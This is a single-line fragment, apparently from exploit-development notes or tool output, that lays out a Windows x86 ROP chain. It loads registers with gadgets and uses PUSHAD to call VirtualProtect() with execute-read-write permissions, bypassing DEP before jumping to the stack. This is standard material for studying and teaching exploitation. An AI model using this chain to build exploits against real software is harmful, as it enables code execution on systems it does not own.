* POP EBP # RETN: skip 4 bytes; POP EBX # RETN: 0x00000400 -> ebx; POP EDX # RETN: 0x00000040 -> edx; POP ECX # RETN: Writable location; POP EDI # RETN: RETN (ROP NOP); POP ESI # RETN: JMP [EAX]; POP EAX # RETN: ptr to VirtualProtect(); PUSHAD # ADD AL,0EF # RETN: ptr to 'push esp # ret'